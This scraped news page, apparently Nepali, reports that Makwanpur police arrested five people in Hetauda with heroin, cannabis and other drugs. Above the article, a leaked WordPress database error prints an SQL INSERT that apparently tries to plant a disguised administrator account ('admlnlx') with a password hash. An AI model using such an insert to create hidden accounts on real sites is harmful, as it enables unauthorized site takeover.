WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bc37NGfcn9tkg67bP5UjgV.leKy42Z.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 21:19:18', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । जिल्ला प्रहरी कार्यालय मकवानपुरले हेटौँडा उपमहानगरपालिकाको छुट्टाछुट्टै स्थानबाट लागूऔषधसहित पाँच जनालाई पक्राउ गरिएको जानकारी दिएको छ ।
प्रहरीले हेटौँडा उपमहानगरपालिका – १६ हटियाबाट पाँच किलो चार सय ग्राम लागूऔषध खैरो हेरोइनसहित ३९ वर्षीय सुवास लामिछाने र हेटौँडा–७ बस्ने २८ वर्षीय विकेश गौतमलाई पक्राउ गरेको हो ।
त्यस्तै, हेटौँडा उपमहानगरपालिका–१२ नयाँ पुलस्थित भित्री बाटोबाट विभिन्न प्रकारको लागूऔषधसहित दुई जनालाई पक्राउ गरिएको हो । पक्राउ पर्नेहरुमा सोही वडामा बस्ने २७ वर्षीय रमेश विश्वकर्मा र २७ वर्षीय सजन विश्वकर्मा रहनुभएको छ । उनीहरुलाई अस्थायी प्रहरी पोष्ट थानाभ¥याङबाट खटिएको टोलीले पक्राउ गरेको हो ।
त्यसैगरी प्रहरीले हेटौँडा उपमहानगरपालिका–१९ गुम्बाचोकबाट पाँच किलो चार सय ग्राम लागूऔषध गाँजासहित एक जनालाई पक्राउ गरेको छ । पक्राउ पर्नेमा हेटौँडा–३ बसामाडी बस्ने ४२ वर्षीय लक्ष्मण बल रहेको छ । रासस